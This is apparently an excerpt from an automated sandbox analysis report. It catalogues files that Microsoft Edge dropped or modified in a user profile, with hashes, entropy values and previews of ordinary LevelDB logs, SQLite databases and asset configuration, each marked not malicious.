                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                                          Entropy (8bit):5.249427040297509
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvkk1CHhJ23oH+Tcwtp3hBtB2KLl5v3VylL+q2PCHhJ23oH+Tcwtp3hBWsIFUv:7BYebp3dFLFTvBYebp3eFUv
                                                                                                                                                                                                                                                                          MD5:958039B6C92EE3CE2B21A23AD6834E55
                                                                                                                                                                                                                                                                          SHA1:78B0CB1C25527F418424B7C6C377C117DA02F07B
                                                                                                                                                                                                                                                                          SHA-256:0AC1C650B778136E4692A9C20E38A82D067E19B5C9DD8EA0E9C5513721F618F1
                                                                                                                                                                                                                                                                          SHA-512:C61DEA8F87CDDFC76BABA02A0960270477B214DBB16BF0EDC02A299E2602C5D1629AB04954BF8EB7CBD990D22DF1CCBB21BB410BDE37B2846890288D111AE357
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:41.996 1a98 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:55:42.015 1a98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):1764710
                                                                                                                                                                                                                                                                          Entropy (8bit):5.138103609826128
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:hKPVfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hK9fqJmcx
                                                                                                                                                                                                                                                                          MD5:2D0BDDE399EB2A86A02E443CC9C08DB9
                                                                                                                                                                                                                                                                          SHA1:C90E0ED548B7352C5A6149FFA4F9CF73387855A3
                                                                                                                                                                                                                                                                          SHA-256:1D39B9CD312A8A491C5BBA0599D7FCCFD02D59C6CDA1E89B3C75FB9B8FA7F791
                                                                                                                                                                                                                                                                          SHA-512:5128FB314664B989707EE85AB0C392B0807777C191C0DF9071A2D3D4930F07AD74A9FF23674B86341C35A104CF9F85A544F5F9F0CF6F3440B4B763EEB68FF927
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1488263651458555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv3A+q2PCHhJ23oH+Tcwt9Eh1tIFUtJv3vWZmwPv3DVkwOCHhJ23oH+Tcwt9Er:7c+vBYeb9Eh16FUttW/zV56Yeb9Eh1VJ
                                                                                                                                                                                                                                                                          MD5:5242639577429B7DFE07E05372FD0A2E
                                                                                                                                                                                                                                                                          SHA1:6AC151C64D3CFA3078BA4E5F03099BCE8DD1F053
                                                                                                                                                                                                                                                                          SHA-256:25F397034840CE8ED63B5C66B5B90D0D7118F82B6558B8C3FAA731492918D207
                                                                                                                                                                                                                                                                          SHA-512:477340F93B664C46E986D320DC1E626CE3CC666F9C53634732E9628D8F17B6B89B29F5E9C2973E5E1FEF04F08E3A06AE662B998DC92034D8E925CE6C10B60885
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:42.313 19ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:55:42.315 19ec Recovering log #3.2025/01/09-08:55:42.341 19ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1488263651458555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv3A+q2PCHhJ23oH+Tcwt9Eh1tIFUtJv3vWZmwPv3DVkwOCHhJ23oH+Tcwt9Er:7c+vBYeb9Eh16FUttW/zV56Yeb9Eh1VJ
                                                                                                                                                                                                                                                                          MD5:5242639577429B7DFE07E05372FD0A2E
                                                                                                                                                                                                                                                                          SHA1:6AC151C64D3CFA3078BA4E5F03099BCE8DD1F053
                                                                                                                                                                                                                                                                          SHA-256:25F397034840CE8ED63B5C66B5B90D0D7118F82B6558B8C3FAA731492918D207
                                                                                                                                                                                                                                                                          SHA-512:477340F93B664C46E986D320DC1E626CE3CC666F9C53634732E9628D8F17B6B89B29F5E9C2973E5E1FEF04F08E3A06AE662B998DC92034D8E925CE6C10B60885
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:42.313 19ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:55:42.315 19ec Recovering log #3.2025/01/09-08:55:42.341 19ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46312689327721746
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuy:TouQq3qh7z3bY2LNW9WMcUvBuy
                                                                                                                                                                                                                                                                          MD5:4EC0D17D4792B6D6732478F6F5527A1D
                                                                                                                                                                                                                                                                          SHA1:8C5D45A173D5423584CBD819792DA901796766C2
                                                                                                                                                                                                                                                                          SHA-256:839BBD0B3524E0131D963CF4C129D1ACCF25CA94B4E54192A5730C4194F087C8
                                                                                                                                                                                                                                                                          SHA-512:854875AA5918B79AE8ED5CCD99F436B9E2FE3E89D2BA19D6739C66D6B3E27BF331C7A5796C0AFD6134DD975ADE2702EB6E5C5B67C5B766D7856B41EEAC6754B2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                          Entropy (8bit):5.250284738882366
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvW1L+q2PCHhJ23oH+TcwtnG2tMsIFUtJvWj1ZmwPvIDwLVkwOCHhJ23oH+Tci:7i1yvBYebn9GFUtwJ/o8R56Yebn95J
                                                                                                                                                                                                                                                                          MD5:CEC05A59E94FD5A04C992E384220A361
                                                                                                                                                                                                                                                                          SHA1:0EC9E16CE3346A004BA882F2A095A4F7B2B9C348
                                                                                                                                                                                                                                                                          SHA-256:146E866635821F1CD568A9F21497B6EE965A4C55B20F01CCBCDE53D5611514DA
                                                                                                                                                                                                                                                                          SHA-512:EF42E10B6E5FB5D921E2DE667FE2C0CA2E6AF667DA533A1F974701937F7DADD512A0ABB504982FE446C476C6E91731D2A9C452354D0659EE480E38CBFB85B6A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.756 f18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:55:35.756 f18 Recovering log #3.2025/01/09-08:55:35.757 f18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                          Entropy (8bit):5.250284738882366
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvW1L+q2PCHhJ23oH+TcwtnG2tMsIFUtJvWj1ZmwPvIDwLVkwOCHhJ23oH+Tci:7i1yvBYebn9GFUtwJ/o8R56Yebn95J
                                                                                                                                                                                                                                                                          MD5:CEC05A59E94FD5A04C992E384220A361
                                                                                                                                                                                                                                                                          SHA1:0EC9E16CE3346A004BA882F2A095A4F7B2B9C348
                                                                                                                                                                                                                                                                          SHA-256:146E866635821F1CD568A9F21497B6EE965A4C55B20F01CCBCDE53D5611514DA
                                                                                                                                                                                                                                                                          SHA-512:EF42E10B6E5FB5D921E2DE667FE2C0CA2E6AF667DA533A1F974701937F7DADD512A0ABB504982FE446C476C6E91731D2A9C452354D0659EE480E38CBFB85B6A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.756 f18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:55:35.756 f18 Recovering log #3.2025/01/09-08:55:35.757 f18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.6135653564275771
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jkTzJtpcVTdmL:TO8D4jJ/6Up+wJ4V+
                                                                                                                                                                                                                                                                          MD5:762BBE0962EAF458B96D11CF44B06B78
                                                                                                                                                                                                                                                                          SHA1:20C292BB1619963140543F76B38D08D8ED7B73F0
                                                                                                                                                                                                                                                                          SHA-256:94643CAC9459959D042F8533C7E78481389D5DF462704EBD3627A21AC5CFC4DF
                                                                                                                                                                                                                                                                          SHA-512:BF8E00AB6A1E2243A0FAE43BBBC0254ADEF83AABFABAF8195E2406C0F809B052446668EA1095FB2A2AFD4349F9DBB59D7BD4828CAFD31A54D1E0E9211F3FAF81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3541564020274395
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:sA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:sFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                          MD5:3DD277646EA26125C3278BA1C4EBD049
                                                                                                                                                                                                                                                                          SHA1:EBA05FCEA7E27E57C5A2F88CE0D860F0CD4DF25A
                                                                                                                                                                                                                                                                          SHA-256:B56E1EE97E32894797FFAF7F57654D70DDEDC8681540B6C451FF7E4D99E81A53
                                                                                                                                                                                                                                                                          SHA-512:DBB874F4251698EED5BFF8DA4E8EAF65C4FD6B497852B53023C67921000975C7D870DBE15B85AA7F9B6E7DD550486AFA274B53A1326799CAB7F00484F54FD24B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380904544388598..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                          Entropy (8bit):5.198416574379778
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv3tRM1CHhJ23oH+Tcwtk2WwnvB2KLl5vZrVq2PCHhJ23oH+Tcwtk2WwnvIFUv:7JRAYebkxwnvFL5ZvBYebkxwnQFUv
                                                                                                                                                                                                                                                                          MD5:62A38A39625A88AC15AB6CA2B547224A
                                                                                                                                                                                                                                                                          SHA1:2E268DA47F7858D1AFE2B121D9287951935A3DAA
                                                                                                                                                                                                                                                                          SHA-256:A2D965C6D0EC19A596BB6C1C5C233C55DA488057B37E3937060F771F1BB844FE
                                                                                                                                                                                                                                                                          SHA-512:28DDC388EBFBFAB8A5F8D9AFB9803D2BCE0C2154520456ED0C0F169FCE0249FEA8555101DFEA302F29D1C84DF8D86831E1D2B2131DFFB1DBF961D30A24672EFB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:42.347 1004 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:55:43.159 1004 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                          Entropy (8bit):5.324612966877732
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rq:C1gAg1zfvC
                                                                                                                                                                                                                                                                          MD5:1E5A9C0BDB0E3A3C15C792419E3B5022
                                                                                                                                                                                                                                                                          SHA1:BCAEB3933BE2DB50FCD22069F90D57A1A92AEB7D
                                                                                                                                                                                                                                                                          SHA-256:43F902408E3D259285F90ED6C1A63E5E66984B6D52504B793467E37CB2ED65B3
                                                                                                                                                                                                                                                                          SHA-512:2DA7D1E8BA9EADB2D2883EF2F75D66CA72237E138C1F39A0923F2F92CFD2030CDF77AD41C89EE715E7016EDA559658B394487211A402AE1AED6631C364AD66E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
